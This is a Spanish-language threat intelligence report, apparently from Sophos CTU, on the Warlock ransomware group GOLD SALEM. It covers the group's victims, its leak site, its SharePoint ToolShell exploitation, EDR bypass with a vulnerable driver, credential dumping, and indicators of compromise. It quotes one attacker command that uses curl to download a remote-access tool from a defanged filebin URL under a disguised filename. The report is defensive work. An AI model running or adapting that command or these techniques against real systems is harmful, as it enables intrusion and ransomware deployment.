Los investigadores de Counter Threat Unit™ (CTU) están vigilando a un grupo de amenazas que se autodenomina Warlock Group. El grupo, al que los investigadores de CTU™ siguen como GOLD SALEM, ha comprometido redes y desplegado su ransomware Warlock desde marzo de 2025. Microsoft se refiere a este grupo de amenazas como Storm-2603 y lo caracteriza «con una confianza moderada como un actor de amenazas con sede en China», pero los investigadores de CTU no tienen pruebas suficientes para corroborar esta atribución.
Victimología y actividad en línea
Las 60 víctimas publicadas por el grupo hasta mediados de septiembre de 2025 lo sitúan en la mitad de la tabla en comparación con otras operaciones de ransomware durante el mismo periodo. Las víctimas de GOLD SALEM van desde pequeñas entidades comerciales o gubernamentales hasta grandes corporaciones multinacionales repartidas por Norteamérica, Europa y Sudamérica. Al igual que la mayoría de los grupos de ransomware, GOLD SALEM ha evitado en gran medida comprometer organizaciones ubicadas en China y Rusia, a pesar de la gran cantidad de objetivos potenciales. Sin embargo, el grupo publicó el nombre de una víctima con sede en Rusia en su sitio web dedicado a la filtración de datos (DLS) el 8 de septiembre. La entidad comercial proporciona servicios de ingeniería y equipos a la industria de generación de electricidad. A pesar de albergar un gran contingente de distribuidores de ransomware a nivel mundial, la Federación Rusa es conocida por perseguir agresivamente a los grupos que atacan a organizaciones en Rusia y sus vecinos «cercanos». La inclusión de una víctima rusa en la lista de GOLD SALEM sugiere que el grupo podría operar desde fuera de esta jurisdicción.
GOLD SALEM no tenía presencia pública hasta que, en junio de 2025, una persona que representaba al grupo publicó en el foro clandestino RAMP una solicitud de exploits para aplicaciones empresariales comunes (por ejemplo, Veeam, ESXi, SharePoint) y herramientas para eliminar los sistemas de detección y respuesta de endpoint (EDR) y otros productos de seguridad. En una publicación posterior se solicitó la cooperación de los intermediarios de acceso inicial (IAB) para proporcionar víctimas potenciales. No está claro si el grupo buscaba acceso para llevar a cabo sus propias intrusiones, reclutar afiliados para una operación incipiente de ransomware como servicio (RaaS), o ambas cosas.
GOLD SALEM opera un DLS basado en Tor para publicar los nombres de las supuestas víctimas y los datos robados a esas víctimas (véase la figura 1). A fecha de 16 de septiembre, se habían publicado en el DLS los datos de 19 de las 60 víctimas incluidas en la lista (32 %). Además, los autores de la amenaza afirman haber vendido los datos de 27 (45 %) de las víctimas a compradores privados, posiblemente en respuesta al impago del rescate. Se sabe que los grupos de ciberdelincuentes venden ocasionalmente datos robados a terceros, pero es probable que las cifras publicadas por GOLD SALEM estén infladas o sean inventadas. Tres nombres de víctimas que figuraban anteriormente en el DLS fueron posteriormente eliminados.
GOLD SALEM ha publicado los nombres de las víctimas afectadas por diferentes operaciones de ransomware. Aunque no es algo frecuente, estas publicaciones pueden representar la venta de acceso a múltiples actores maliciosos por parte de IAB, la publicación de datos robados en múltiples sitios web de ransomware por parte de afiliados o la incapacidad de las víctimas para remediar eficazmente los vectores de acceso iniciales comunes, lo que conduce a compromisos repetidos. Por ejemplo, un contratista con sede en EE. UU. que supuestamente sufrió una violación a principios de junio de 2025 ya había sido víctima del ransomware Hunters International de GOLD CRESCENT en octubre de 2024 y de Payout Kings en junio de 2025.
Los datos publicados por GOLD SALEM y los metadatos extraídos de su DLS sugieren que el grupo comenzó a atacar y extorsionar a las víctimas en marzo de 2025. Una publicación del 10 de junio en el foro RAMP anunciaba Warlock e incluía un enlace a la primera iteración de un DLS basado en Tor. La dirección Tor se desconectó el 11 de junio y no apareció un nuevo sitio hasta finales de julio. GOLD SALEM tiende a publicar en el DLS por lotes, lo que hace que las víctimas aparezcan entre varios días y varias semanas después de la vulneración real. A cada víctima se le asigna una fecha de «cuenta atrás» que indica la fecha límite para pagar el rescate (véase la figura 2). Esta fecha suele ser entre 12 y 14 días después de que la víctima aparezca en el DLS.
Incidentes observados
A finales de julio, los investigadores de CTU analizaron un incidente en el que GOLD SALEM utilizó la cadena de exploits ToolShell contra servidores SharePoint para obtener acceso inicial. Esta cadena de exploits se basa en el uso de una combinación de vulnerabilidades CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 y CVE-2025-53771. La explotación dio como resultado la colocación de un shell web ASPX que creó un objeto Process para cmd.exe dentro del contexto del proceso de trabajo IIS (w3wp.exe). A continuación, el atacante podía ejecutar de forma remota comandos arbitrarios y ver cualquier resultado obtenido. Los investigadores del CTU observaron el siguiente comando emitido a través de este shell web:
curl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt
El ejecutable descargado era un servidor WebSockets basado en Golang que permitía el acceso continuo al servidor comprometido independientemente del shell web. Los investigadores de CTU también observaron que GOLD SALEM eludía el EDR utilizando la técnica Bring Your Own Vulnerable Driver (BYOVD) y un controlador vulnerable de Baidu Antivirus renombrado como googleApiUtil64.sys para terminar el agente EDR. Un fallo en este controlador (CVE-2024-51324) permite terminar procesos arbitrarios.
El perfil de Microsoft sobre el grupo señaló la ejecución de Mimikatz «dirigido específicamente a la memoria del Servicio del Subsistema de Autoridad de Seguridad Local (LSASS) para extraer credenciales de texto sin formato». Microsoft también observó el uso de PsExec e Impacket para el movimiento lateral y el uso de Objetos de Política de Grupo (GPO) para desplegar la carga útil de Warlock.
En agosto, los investigadores de la CTU observaron que GOLD SALEM abusaba de la herramienta legítima de código abierto Velociraptor para análisis forense digital y respuesta a incidentes (DFIR) con el fin de establecer un túnel de red Visual Studio Code dentro del entorno comprometido. Algunos de estos incidentes terminaron con el despliegue del ransomware Warlock.
Mitigaciones y detecciones
Las organizaciones deben implementar una supervisión regular de la superficie de ataque y contar con políticas agresivas de aplicación de parches para los servicios conectados a Internet. La detección y mitigación de la explotación de día cero requiere una supervisión proactiva de los endpoints y una respuesta oportuna a los incidentes.
Las siguientes protecciones de Sophos detectan la actividad relacionada con esta amenaza:
- Troj/WebShel-F
- Troj/Warlock-B
Para mitigar la exposición a esta amenaza, los investigadores de la CTU recomiendan que los clientes utilicen los controles disponibles para revisar y restringir el acceso utilizando los indicadores que se enumeran en la tabla 1.
| Indicador | Tipo | Contexto |
| bfbeac96a385b1e5643ec0752b132506 | MD5 hash | Shell web ASPX utilizado por GOLD SALEM después de la explotación de SharePoint ToolShell |
| de25be0afd53a1d274eec02e5303622fc8e7dbd5 | SHA1 hash | Shell web ASPX utilizado por GOLD SALEM tras la explotación de SharePoint ToolShell |
| 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1 | SHA256 hash | Shell web ASPX utilizado por GOLD SALEM tras la explotación de SharePoint ToolShell |
| b3a099ecca79503a0e4a154bd85d3e6b | MD5 hash | Herramienta de acceso remoto WebSockets utilizada por GOLD SALEM (wsocks.exe.txt) |
| 6d0cc6349a951f0b52394ad3436d1656ec5fba6a | SHA1 hash | Herramienta de acceso remoto WebSockets utilizada por GOLD SALEM (wsocks.exe.txt) |
| a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4 | SHA256 hash | Herramienta de acceso remoto WebSockets utilizada por GOLD SALEM (wsocks.exe.txt) |
Tabla 1: indicadores de esta amenaza
